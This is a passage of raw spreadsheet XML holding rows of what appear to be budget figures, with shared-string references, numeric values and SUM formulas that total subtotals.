        <v>3044</v>
      </c>
      <c r="C330" s="17">
        <v>-571</v>
      </c>
      <c r="D330" s="13" t="s">
        <v>4919</v>
      </c>
      <c r="E330" s="16" t="s">
        <v>3045</v>
      </c>
      <c r="F330" s="17">
        <v>100</v>
      </c>
    </row>
    <row r="331" spans="1:6">
      <c r="A331" s="10" t="s">
        <v>4920</v>
      </c>
      <c r="B331" s="16" t="s">
        <v>3046</v>
      </c>
      <c r="C331" s="17">
        <v>5342</v>
      </c>
      <c r="D331" s="13" t="s">
        <v>4921</v>
      </c>
      <c r="E331" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F331" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="332" spans="1:6">
      <c r="A332" s="10" t="s">
        <v>4922</v>
      </c>
      <c r="B332" s="16" t="s">
        <v>3047</v>
      </c>
      <c r="C332" s="17">
        <v>0</v>
      </c>
      <c r="D332" s="13" t="s">
        <v>4923</v>
      </c>
      <c r="E332" s="16" t="s">
        <v>3048</v>
      </c>
      <c r="F332" s="17">
        <v>1040</v>
      </c>
    </row>
    <row r="333" spans="1:6">
      <c r="A333" s="10" t="s">
        <v>4924</v>
      </c>
      <c r="B333" s="16" t="s">
        <v>3049</v>
      </c>
      <c r="C333" s="17">
        <v>0</v>
      </c>
      <c r="D333" s="13" t="s">
        <v>4925</v>
      </c>
      <c r="E333" s="11" t="s">
        <v>3050</v>
      </c>
      <c r="F333" s="12">
        <f>SUM(F334:F346)</f>
        <v>1525</v>
      </c>
    </row>
    <row r="334" spans="1:6">
      <c r="A334" s="10" t="s">
        <v>4926</v>
      </c>
      <c r="B334" s="16" t="s">
        <v>3051</v>
      </c>
      <c r="C334" s="17">
        <v>0</v>
      </c>
      <c r="D334" s="13" t="s">
        <v>4927</v>
      </c>
      <c r="E334" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F334" s="17">
        <v>1359</v>
      </c>
    </row>
    <row r="335" spans="1:6">
      <c r="A335" s="10" t="s">
        <v>4928</v>
      </c>
      <c r="B335" s="16" t="s">
        <v>3052</v>
      </c>
      <c r="C335" s="17">
        <v>0</v>
      </c>
      <c r="D335" s="13" t="s">
        <v>4929</v>
      </c>
      <c r="E335" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F335" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="336" spans="1:6">
      <c r="A336" s="10" t="s">
        <v>4930</v>
      </c>
      <c r="B336" s="16" t="s">
        <v>3053</v>
      </c>
      <c r="C336" s="17">
        <v>0</v>
      </c>
      <c r="D336" s="13" t="s">
        <v>4931</v>
      </c>
      <c r="E336" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F336" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="337" spans="1:6">
      <c r="A337" s="10" t="s">
        <v>4932</v>
      </c>
      <c r="B337" s="16" t="s">
        <v>3054</v>
      </c>
      <c r="C337" s="12">
        <f>C338+C339</f>
        <v>918</v>
      </c>
      <c r="D337" s="13" t="s">
        <v>4933</v>
      </c>
      <c r="E337" s="16" t="s">
        <v>3055</v>
      </c>
      <c r="F337" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="338" spans="1:6">
      <c r="A338" s="10" t="s">
        <v>4934</v>
      </c>
      <c r="B338" s="16" t="s">
        <v>3056</v>
      </c>
      <c r="C338" s="17">
        <v>541</v>
      </c>
      <c r="D338" s="13" t="s">
        <v>4935</v>
      </c>
      <c r="E338" s="16" t="s">
        <v>3057</v>
      </c>
      <c r="F338" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="339" spans="1:6">
      <c r="A339" s="10" t="s">
        <v>4936</v>
      </c>
      <c r="B339" s="16" t="s">
        <v>3058</v>
      </c>
      <c r="C339" s="17">
        <v>377</v>
      </c>
      <c r="D339" s="13" t="s">
        <v>4937</v>
      </c>
      <c r="E339" s="16" t="s">
        <v>3059</v>
      </c>
      <c r="F339" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="340" spans="1:6">
      <c r="A340" s="10" t="s">
        <v>4938</v>
      </c>
      <c r="B340" s="16" t="s">
        <v>3060</v>
      </c>
      <c r="C340" s="17">
        <v>7428</v>
      </c>
      <c r="D340" s="13" t="s">
        <v>4939</v>
      </c>
      <c r="E340" s="16" t="s">
        <v>3061</v>
      </c>
      <c r="F340" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="341" spans="1:6">
      <c r="A341" s="10" t="s">
        <v>4940</v>
      </c>
      <c r="B341" s="16" t="s">
        <v>3062</v>
      </c>
      <c r="C341" s="17">
        <v>0</v>
      </c>
      <c r="D341" s="13" t="s">
        <v>4941</v>
      </c>
      <c r="E341" s="16" t="s">
        <v>3063</v>
      </c>
      <c r="F341" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="342" spans="1:6">
      <c r="A342" s="10" t="s">
        <v>4942</v>
      </c>
      <c r="B342" s="16" t="s">
        <v>3064</v>
      </c>
      <c r="C342" s="12">
        <f>SUM(C343:C344)</f>
        <v>0</v>
      </c>
      <c r="D342" s="13" t="s">
        <v>4943</v>
      </c>
      <c r="E342" s="16" t="s">
        <v>3065</v>
      </c>
      <c r="F342" s="17">
        <v>10</v>
      </c>
    </row>
    <row r="343" spans="1:6">
      <c r="A343" s="10" t="s">
        <v>4944</v>
      </c>
      <c r="B343" s="16" t="s">
        <v>3066</v>
      </c>
      <c r="C343" s="17">
        <v>0</v>
      </c>
      <c r="D343" s="13" t="s">
        <v>4945</v>
      </c>
      <c r="E343" s="16" t="s">
        <v>3067</v>
      </c>
      <c r="F343" s="17">
        <v>21</v>
      </c>
    </row>
    <row r="344" spans="1:6">
      <c r="A344" s="10" t="s">
        <v>4946</v>
      </c>
      <c r="B344" s="16" t="s">
        <v>3068</v>
      </c>
      <c r="C344" s="17">
        <v>0</v>
      </c>
      <c r="D344" s="13" t="s">
        <v>4947</v>
      </c>
      <c r="E344" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F344" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="345" spans="1:6">
      <c r="A345" s="10" t="s">
        <v>4948</v>
      </c>
      <c r="B345" s="16" t="s">
        <v>3069</v>
      </c>
      <c r="C345" s="17">
        <v>0</v>
      </c>
      <c r="D345" s="13" t="s">
        <v>4949</v>
      </c>
      <c r="E345" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F345" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="346" spans="1:6">
      <c r="A346" s="10" t="s">
        <v>4950</v>
      </c>
      <c r="B346" s="16" t="s">
        <v>3070</v>
      </c>
      <c r="C346" s="17">
        <v>0</v>
      </c>
      <c r="D346" s="13" t="s">
        <v>4951</v>
      </c>
      <c r="E346" s="16" t="s">
        <v>3071</v>
      </c>
      <c r="F346" s="17">
        <v>135</v>
      </c>
    </row>
    <row r="347" spans="1:6">
      <c r="A347" s="10" t="s">
        <v>4952</v>
      </c>
      <c r="B347" s="16" t="s">
        <v>3072</v>
      </c>
      <c r="C347" s="17">
        <v>0</v>
      </c>
      <c r="D347" s="13" t="s">
        <v>4953</v>
      </c>
      <c r="E347" s="11" t="s">
        <v>3073</v>
      </c>
      <c r="F347" s="12">
        <f>SUM(F348:F356)</f>
        <v>0</v>
      </c>
    </row>
    <row r="348" spans="1:6">
      <c r="A348" s="10" t="s">
        <v>4954</v>
      </c>
      <c r="B348" s="16" t="s">
        <v>3074</v>
      </c>
      <c r="C348" s="17">
        <v>0</v>
      </c>
      <c r="D348" s="13" t="s">
        <v>4955</v>
      </c>
      <c r="E348" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F348" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="349" spans="1:6">
      <c r="A349" s="10" t="s">
        <v>4956</v>
      </c>
      <c r="B349" s="16" t="s">
        <v>3075</v>
      </c>
      <c r="C349" s="17">
        <v>0</v>
      </c>
      <c r="D349" s="13" t="s">
        <v>4957</v>
      </c>
      <c r="E349" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F349" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="350" spans="1:6">
      <c r="A350" s="10" t="s">
        <v>4958</v>
      </c>
      <c r="B350" s="16" t="s">
        <v>3076</v>
      </c>
      <c r="C350" s="17">
        <v>2000</v>
      </c>
      <c r="D350" s="13" t="s">
        <v>4959</v>
      </c>
      <c r="E350" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F350" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="351" spans="1:6">
      <c r="A351" s="10" t="s">
        <v>4960</v>
      </c>
      <c r="B351" s="16" t="s">
        <v>3077</v>
      </c>
      <c r="C351" s="12">
        <f>SUM(C352:C358)</f>
        <v>0</v>
      </c>
      <c r="D351" s="13" t="s">
        <v>4961</v>
      </c>
      <c r="E351" s="16" t="s">
        <v>3078</v>
      </c>
      <c r="F351" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="352" spans="1:6">
      <c r="A352" s="10" t="s">
        <v>4962</v>
      </c>
      <c r="B352" s="16" t="s">
        <v>3079</v>
      </c>
      <c r="C352" s="17">
        <v>0</v>
      </c>
      <c r="D352" s="13" t="s">
        <v>4963</v>
      </c>
      <c r="E352" s="16" t="s">
        <v>3080</v>
      </c>
      <c r="F352" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="353" spans="1:6">
      <c r="A353" s="10" t="s">
        <v>4964</v>
      </c>
      <c r="B353" s="16" t="s">
        <v>3081</v>
      </c>
      <c r="C353" s="17">
        <v>0</v>
      </c>
      <c r="D353" s="13" t="s">
        <v>4965</v>
      </c>
      <c r="E353" s="16" t="s">
        <v>3082</v>
      </c>
      <c r="F353" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="354" spans="1:6">
      <c r="A354" s="10" t="s">
        <v>4966</v>
      </c>
      <c r="B354" s="16" t="s">
        <v>3083</v>
      </c>
      <c r="C354" s="17">
        <v>0</v>
      </c>
      <c r="D354" s="13" t="s">
        <v>4967</v>
      </c>
      <c r="E354" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F354" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="355" spans="1:6">
      <c r="A355" s="10" t="s">
        <v>4968</v>
      </c>
      <c r="B355" s="16" t="s">
        <v>3084</v>
      </c>
      <c r="C355" s="17">
        <v>0</v>
      </c>
      <c r="D355" s="13" t="s">
        <v>4969</v>
      </c>
      <c r="E355" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F355" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="356" spans="1:6">
      <c r="A356" s="10" t="s">
        <v>4970</v>
      </c>
      <c r="B356" s="16" t="s">
        <v>3085</v>
      </c>
      <c r="C356" s="17">
        <v>0</v>
      </c>
      <c r="D356" s="13" t="s">
        <v>4971</v>
      </c>
      <c r="E356" s="16" t="s">
        <v>3086</v>
      </c>
      <c r="F356" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="357" spans="1:6">
      <c r="A357" s="10" t="s">
        <v>4972</v>
      </c>
      <c r="B357" s="16" t="s">
        <v>3087</v>
      </c>
      <c r="C357" s="17">
        <v>0</v>
      </c>
      <c r="D357" s="13" t="s">
        <v>4973</v>
      </c>
      <c r="E357" s="11" t="s">
        <v>3088</v>
      </c>
      <c r="F357" s="12">
        <f>SUM(F358:F366)</f>
        <v>0</v>
      </c>
    </row>
    <row r="358" spans="1:6">
      <c r="A358" s="10" t="s">
        <v>4974</v>
      </c>
      <c r="B358" s="16" t="s">
        <v>3089</v>
      </c>
      <c r="C358" s="17">
        <v>0</v>
      </c>
      <c r="D358" s="13" t="s">
        <v>4975</v>
      </c>
      <c r="E358" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F358" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="359" spans="1:6">
      <c r="A359" s="10" t="s">
        <v>4976</v>
      </c>
      <c r="B359" s="16" t="s">
        <v>3090</v>
      </c>
      <c r="C359" s="17">
        <v>0</v>
      </c>
      <c r="D359" s="13" t="s">
        <v>4977</v>
      </c>
      <c r="E359" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F359" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="360" spans="1:6">
      <c r="A360" s="10" t="s">
        <v>4978</v>
      </c>
      <c r="B360" s="11" t="s">
        <v>3091</v>
      </c>
      <c r="C360" s="12">
        <f>SUM(C361:C364,C368:C373,C376:C377)</f>
        <v>1315</v>
      </c>
      <c r="D360" s="13" t="s">
        <v>4979</v>
      </c>
      <c r="E360" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F360" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="361" spans="1:6">
      <c r="A361" s="10" t="s">
        <v>4980</v>
      </c>
      <c r="B361" s="16" t="s">
        <v>3092</v>
      </c>
      <c r="C361" s="17">
        <v>0</v>
      </c>
      <c r="D361" s="13" t="s">
        <v>4981</v>
      </c>
      <c r="E361" s="16" t="s">
        <v>3093</v>
      </c>
      <c r="F361" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="362" spans="1:6">
      <c r="A362" s="10" t="s">
        <v>4982</v>
      </c>
      <c r="B362" s="16" t="s">
        <v>3094</v>
      </c>
      <c r="C362" s="17">
        <v>0</v>
      </c>
      <c r="D362" s="13" t="s">
        <v>4983</v>
      </c>
      <c r="E362" s="16" t="s">
        <v>3095</v>
      </c>
      <c r="F362" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="363" spans="1:6">
      <c r="A363" s="10" t="s">
        <v>4984</v>
      </c>
      <c r="B363" s="16" t="s">
        <v>3096</v>
      </c>
      <c r="C363" s="17">
        <v>0</v>
      </c>
      <c r="D363" s="13" t="s">
        <v>4985</v>
      </c>
      <c r="E363" s="16" t="s">
        <v>3097</v>
      </c>
      <c r="F363" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="364" spans="1:6">
      <c r="A364" s="10" t="s">
        <v>4986</v>
      </c>
      <c r="B364" s="16" t="s">
        <v>3098</v>
      </c>
      <c r="C364" s="12">
        <f>SUM(C365:C367)</f>
        <v>0</v>
      </c>
      <c r="D364" s="13" t="s">
        <v>4987</v>
      </c>
      <c r="E364" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F364" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="365" spans="1:6">
      <c r="A365" s="10" t="s">
        <v>4988</v>
      </c>
      <c r="B365" s="16" t="s">
        <v>3099</v>
      </c>
      <c r="C365" s="17">
        <v>0</v>
      </c>
      <c r="D365" s="13" t="s">
        <v>4989</v>
      </c>
      <c r="E365" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F365" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="366" spans="1:6">
      <c r="A366" s="10" t="s">
        <v>4990</v>
      </c>
      <c r="B366" s="16" t="s">
        <v>3100</v>
      </c>
      <c r="C366" s="17">
        <v>0</v>
      </c>
      <c r="D366" s="13" t="s">
        <v>4991</v>
      </c>
      <c r="E366" s="16" t="s">
        <v>3101</v>
      </c>
      <c r="F366" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="367" spans="1:6">
      <c r="A367" s="10" t="s">
        <v>4992</v>
      </c>
      <c r="B367" s="16" t="s">
        <v>3102</v>
      </c>
      <c r="C367" s="17">
        <v>0</v>
      </c>
      <c r="D367" s="18" t="s">
        <v>4993</v>
      </c>
      <c r="E367" s="22" t="s">
        <v>3103</v>
      </c>
      <c r="F367" s="15">
        <f>SUM(F368:F374)</f>
        <v>0</v>
      </c>
    </row>
    <row r="368" spans="1:6">
      <c r="A368" s="10" t="s">
        <v>4994</v>
      </c>
      <c r="B368" s="16" t="s">
        <v>3104</v>
      </c>
      <c r="C368" s="17">
        <v>0</v>
      </c>
      <c r="D368" s="13" t="s">
        <v>4995</v>
      </c>
      <c r="E368" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F368" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="369" spans="1:6">
      <c r="A369" s="10" t="s">
        <v>4996</v>
      </c>
      <c r="B369" s="16" t="s">
        <v>3105</v>
      </c>
      <c r="C369" s="17">
        <v>0</v>
      </c>
      <c r="D369" s="13" t="s">
        <v>4997</v>
      </c>
      <c r="E369" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F369" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="370" spans="1:6">
      <c r="A370" s="10" t="s">
        <v>4998</v>
      </c>
      <c r="B370" s="16" t="s">
        <v>3106</v>
      </c>
      <c r="C370" s="17">
        <v>0</v>
      </c>
      <c r="D370" s="13" t="s">
        <v>4999</v>
      </c>
      <c r="E370" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F370" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="371" spans="1:6">
      <c r="A371" s="10" t="s">
        <v>5000</v>
      </c>
      <c r="B371" s="16" t="s">
        <v>3107</v>
      </c>
      <c r="C371" s="17">
        <v>0</v>
      </c>
      <c r="D371" s="13" t="s">
        <v>5001</v>
      </c>
      <c r="E371" s="16" t="s">
        <v>3108</v>
      </c>
      <c r="F371" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="372" spans="1:6">
      <c r="A372" s="10" t="s">
        <v>5002</v>
      </c>
      <c r="B372" s="16" t="s">
        <v>3109</v>
      </c>
      <c r="C372" s="17">
        <v>0</v>
      </c>
      <c r="D372" s="13" t="s">
        <v>5003</v>
      </c>
      <c r="E372" s="16" t="s">
        <v>3110</v>
      </c>
      <c r="F372" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="373" spans="1:6">
      <c r="A373" s="10" t="s">
        <v>5004</v>
      </c>
      <c r="B373" s="16" t="s">
        <v>3111</v>
      </c>
      <c r="C373" s="12">
        <f>C374+C375</f>
        <v>0</v>
      </c>
      <c r="D373" s="13" t="s">
        <v>5005</v>
      </c>
      <c r="E373" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F373" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="374" spans="1:6">
      <c r="A374" s="10" t="s">
        <v>5006</v>
      </c>
      <c r="B374" s="16" t="s">
        <v>3112</v>
      </c>
      <c r="C374" s="17">
        <v>0</v>
      </c>
      <c r="D374" s="13" t="s">
        <v>5007</v>
      </c>
      <c r="E374" s="16" t="s">
        <v>3113</v>
      </c>
      <c r="F374" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="375" spans="1:6">
      <c r="A375" s="10" t="s">
        <v>5008</v>
      </c>
      <c r="B375" s="16" t="s">
        <v>3114</v>
      </c>
      <c r="C375" s="17">
        <v>0</v>
      </c>
      <c r="D375" s="13" t="s">
        <v>5009</v>
      </c>
      <c r="E375" s="11" t="s">
        <v>3115</v>
      </c>
      <c r="F375" s="12">
        <f>SUM(F376:F380)</f>
        <v>0</v>
      </c>
    </row>
    <row r="376" spans="1:6">
      <c r="A376" s="10" t="s">
        <v>5010</v>
      </c>
      <c r="B376" s="16" t="s">
        <v>3116</v>
      </c>
      <c r="C376" s="17">
        <v>0</v>
      </c>
      <c r="D376" s="13" t="s">
        <v>5011</v>
      </c>
      <c r="E376" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F376" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="377" spans="1:6">
      <c r="A377" s="10" t="s">
        <v>5012</v>
      </c>
      <c r="B377" s="16" t="s">
        <v>3117</v>
      </c>
      <c r="C377" s="12">
        <f>C378+C379</f>
        <v>1315</v>
      </c>
      <c r="D377" s="13" t="s">
        <v>5013</v>
      </c>
      <c r="E377" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F377" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="378" spans="1:6">
      <c r="A378" s="10" t="s">
        <v>5014</v>
      </c>
      <c r="B378" s="16" t="s">
        <v>3118</v>
      </c>
      <c r="C378" s="17">
        <v>1315</v>
      </c>
      <c r="D378" s="13" t="s">
        <v>5015</v>
      </c>
      <c r="E378" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F378" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="379" spans="1:6">
      <c r="A379" s="10" t="s">
        <v>5016</v>
      </c>
      <c r="B379" s="16" t="s">
        <v>3119</v>
      </c>
      <c r="C379" s="17">
        <v>0</v>
      </c>
      <c r="D379" s="13" t="s">
        <v>5017</v>
      </c>
      <c r="E379" s="16" t="s">
        <v>3120</v>
      </c>
      <c r="F379" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="380" spans="1:6">
      <c r="A380" s="10"/>
      <c r="B380" s="16"/>
      <c r="C380" s="21"/>
      <c r="D380" s="13" t="s">
        <v>5018</v>
      </c>
      <c r="E380" s="16" t="s">
        <v>3121</v>
      </c>
      <c r="F380" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="381" spans="1:6">
      <c r="A381" s="10" t="s">
        <v>4743</v>
      </c>
      <c r="B381" s="11" t="s">
        <v>3122</v>
      </c>
      <c r="C381" s="12">
        <f>SUM(C382,C414,C419,C425,C429)</f>
        <v>11645</v>
      </c>
      <c r="D381" s="13" t="s">
        <v>5019</v>
      </c>
      <c r="E381" s="11" t="s">
        <v>3123</v>
      </c>
      <c r="F381" s="12">
        <f>F382+F383</f>
        <v>744</v>
      </c>
    </row>
    <row r="382" spans="1:6">
      <c r="A382" s="10" t="s">
        <v>4745</v>
      </c>
      <c r="B382" s="16" t="s">
        <v>3124</v>
      </c>
      <c r="C382" s="12">
        <f>SUM(C383:C413)</f>
        <v>25</v>
      </c>
      <c r="D382" s="13" t="s">
        <v>5020</v>
      </c>
      <c r="E382" s="16" t="s">
        <v>3125</v>
      </c>
      <c r="F382" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="383" spans="1:6">
      <c r="A383" s="10" t="s">
        <v>5021</v>
      </c>
      <c r="B383" s="16" t="s">
        <v>3126</v>
      </c>
      <c r="C383" s="17">
        <v>0</v>
      </c>
      <c r="D383" s="13" t="s">
        <v>5022</v>
      </c>
      <c r="E383" s="16" t="s">
        <v>3127</v>
      </c>
      <c r="F383" s="17">
        <v>744</v>
      </c>
    </row>
    <row r="384" spans="1:6">
      <c r="A384" s="10" t="s">
        <v>5023</v>
      </c>
      <c r="B384" s="16" t="s">
        <v>3128</v>
      </c>
      <c r="C384" s="17">
        <v>0</v>
      </c>
      <c r="D384" s="13" t="s">
        <v>5024</v>
      </c>
      <c r="E384" s="11" t="s">
        <v>3129</v>
      </c>
      <c r="F384" s="12">
        <f>F385+F390+F397+F403+F409+F413+F417+F421+F427+F434</f>
        <v>107070</v>
      </c>
    </row>
    <row r="385" spans="1:6">
      <c r="A385" s="10" t="s">
        <v>5025</v>
      </c>
      <c r="B385" s="16" t="s">
        <v>3130</v>
      </c>
      <c r="C385" s="17">
        <v>0</v>
      </c>
      <c r="D385" s="13" t="s">
        <v>5026</v>
      </c>
      <c r="E385" s="11" t="s">
        <v>3131</v>
      </c>
      <c r="F385" s="12">
        <f>SUM(F386:F389)</f>
        <v>1364</v>
      </c>
    </row>
    <row r="386" spans="1:6">
      <c r="A386" s="10" t="s">
        <v>5027</v>
      </c>
      <c r="B386" s="16" t="s">
        <v>3132</v>
      </c>
      <c r="C386" s="17">
        <v>0</v>
      </c>
      <c r="D386" s="13" t="s">
        <v>5028</v>
      </c>
      <c r="E386" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F386" s="17">
        <v>1294</v>
      </c>
    </row>
    <row r="387" spans="1:6">
      <c r="A387" s="10" t="s">
        <v>5029</v>
      </c>
      <c r="B387" s="16" t="s">
        <v>3133</v>
      </c>
      <c r="C387" s="17">
        <v>0</v>
      </c>
      <c r="D387" s="13" t="s">
        <v>5030</v>
      </c>
      <c r="E387" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F387" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="388" spans="1:6">
      <c r="A388" s="10" t="s">
        <v>5031</v>
      </c>
      <c r="B388" s="16" t="s">
        <v>3134</v>
      </c>
      <c r="C388" s="17">
        <v>0</v>
      </c>
      <c r="D388" s="13" t="s">
        <v>5032</v>
      </c>
      <c r="E388" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F388" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="389" spans="1:6">
      <c r="A389" s="10" t="s">
        <v>5033</v>
      </c>
      <c r="B389" s="16" t="s">
        <v>3135</v>
      </c>
      <c r="C389" s="17">
        <v>0</v>
      </c>
      <c r="D389" s="13" t="s">
        <v>5034</v>
      </c>
      <c r="E389" s="16" t="s">
        <v>3136</v>
      </c>
      <c r="F389" s="17">
        <v>70</v>
      </c>
    </row>
    <row r="390" spans="1:6">
      <c r="A390" s="10" t="s">
        <v>5035</v>
      </c>
      <c r="B390" s="16" t="s">
        <v>3137</v>
      </c>
      <c r="C390" s="17">
        <v>0</v>
      </c>
      <c r="D390" s="13" t="s">
        <v>5036</v>
      </c>
      <c r="E390" s="11" t="s">
        <v>3138</v>
      </c>
      <c r="F390" s="12">
        <f>SUM(F391:F396)</f>
        <v>92018</v>
      </c>
    </row>
    <row r="391" spans="1:6">
      <c r="A391" s="10" t="s">
        <v>5037</v>
      </c>
      <c r="B391" s="16" t="s">
        <v>3139</v>
      </c>
      <c r="C391" s="17">
        <v>0</v>
      </c>
      <c r="D391" s="13" t="s">
        <v>5038</v>
      </c>
      <c r="E391" s="16" t="s">
        <v>3140</v>
      </c>
      <c r="F391" s="17">
        <v>7580</v>
      </c>
    </row>
    <row r="392" spans="1:6">
      <c r="A392" s="10" t="s">
        <v>5039</v>
      </c>
      <c r="B392" s="16" t="s">
        <v>3141</v>
      </c>
      <c r="C392" s="17">
        <v>0</v>
      </c>
      <c r="D392" s="13" t="s">
        <v>5040</v>
      </c>
      <c r="E392" s="16" t="s">
        <v>3142</v>
      </c>
      <c r="F392" s="17">
        <v>33133</v>
      </c>
    </row>
    <row r="393" spans="1:6">
      <c r="A393" s="10" t="s">
        <v>5041</v>
      </c>
      <c r="B393" s="16" t="s">
        <v>3143</v>
      </c>
      <c r="C393" s="17">
        <v>0</v>
      </c>
      <c r="D393" s="13" t="s">
        <v>5042</v>
      </c>
      <c r="E393" s="16" t="s">
        <v>3144</v>
      </c>
      <c r="F393" s="17">
        <v>34863</v>
      </c>
    </row>
    <row r="394" spans="1:6">
      <c r="A394" s="10" t="s">
        <v>5043</v>
      </c>
      <c r="B394" s="16" t="s">
        <v>3145</v>
      </c>
      <c r="C394" s="17">
        <v>0</v>
      </c>
      <c r="D394" s="13" t="s">
        <v>5044</v>
      </c>
      <c r="E394" s="16" t="s">
        <v>3146</v>
      </c>
      <c r="F394" s="17">
        <v>12936</v>
      </c>
    </row>
    <row r="395" spans="1:6">
      <c r="A395" s="10" t="s">
        <v>5045</v>
      </c>
      <c r="B395" s="16" t="s">
        <v>3147</v>
      </c>
      <c r="C395" s="17">
        <v>0</v>
      </c>
      <c r="D395" s="13" t="s">
        <v>5046</v>
      </c>
      <c r="E395" s="16" t="s">
        <v>3148</v>
      </c>
      <c r="F395" s="17">
        <v>3</v>
      </c>
    </row>
    <row r="396" spans="1:6">
      <c r="A396" s="10" t="s">
        <v>5047</v>
      </c>
      <c r="B396" s="16" t="s">
        <v>3149</v>
      </c>
      <c r="C396" s="17">
        <v>0</v>
      </c>
      <c r="D396" s="13" t="s">
        <v>5048</v>
      </c>
      <c r="E396" s="16" t="s">
        <v>3150</v>
      </c>
      <c r="F396" s="17">
        <v>3503</v>
      </c>
    </row>
    <row r="397" spans="1:6">
      <c r="A397" s="10" t="s">
        <v>5049</v>
      </c>
      <c r="B397" s="16" t="s">
        <v>3151</v>
      </c>
      <c r="C397" s="17">
        <v>0</v>
      </c>
      <c r="D397" s="13" t="s">
        <v>5050</v>
      </c>
      <c r="E397" s="11" t="s">
        <v>3152</v>
      </c>
      <c r="F397" s="12">
        <f>SUM(F398:F402)</f>
        <v>5457</v>
      </c>
    </row>
    <row r="398" spans="1:6">
      <c r="A398" s="10" t="s">
        <v>5051</v>
      </c>
      <c r="B398" s="16" t="s">
        <v>3153</v>
      </c>
      <c r="C398" s="17">
        <v>0</v>
      </c>
      <c r="D398" s="13" t="s">
        <v>5052</v>
      </c>
      <c r="E398" s="16" t="s">
        <v>3154</v>
      </c>
      <c r="F398" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="399" spans="1:6">
      <c r="A399" s="10" t="s">
        <v>5053</v>
      </c>
      <c r="B399" s="16" t="s">
        <v>3155</v>
      </c>
      <c r="C399" s="17">
        <v>0</v>
      </c>
      <c r="D399" s="13" t="s">
        <v>5054</v>
      </c>
      <c r="E399" s="16" t="s">
        <v>3156</v>
      </c>
      <c r="F399" s="17">
        <v>5457</v>
      </c>
    </row>
    <row r="400" spans="1:6">
      <c r="A400" s="10" t="s">
        <v>5055</v>
      </c>
      <c r="B400" s="16" t="s">
        <v>3157</v>
      </c>
      <c r="C400" s="17">
        <v>0</v>
      </c>
      <c r="D400" s="13" t="s">
        <v>5056</v>
      </c>
      <c r="E400" s="16" t="s">
        <v>3158</v>
      </c>
      <c r="F400" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="401" spans="1:6">
      <c r="A401" s="10" t="s">
        <v>5057</v>
      </c>
      <c r="B401" s="16" t="s">
        <v>3159</v>
      </c>
      <c r="C401" s="17">
        <v>0</v>
      </c>
      <c r="D401" s="13" t="s">
        <v>5058</v>
      </c>
      <c r="E401" s="16" t="s">
        <v>3160</v>
      </c>
      <c r="F401" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="402" spans="1:6">
      <c r="A402" s="10" t="s">
        <v>5059</v>
      </c>
      <c r="B402" s="16" t="s">
        <v>3161</v>
      </c>
      <c r="C402" s="17">
        <v>0</v>
      </c>
      <c r="D402" s="13" t="s">
        <v>5060</v>
      </c>
      <c r="E402" s="16" t="s">
        <v>3162</v>
      </c>
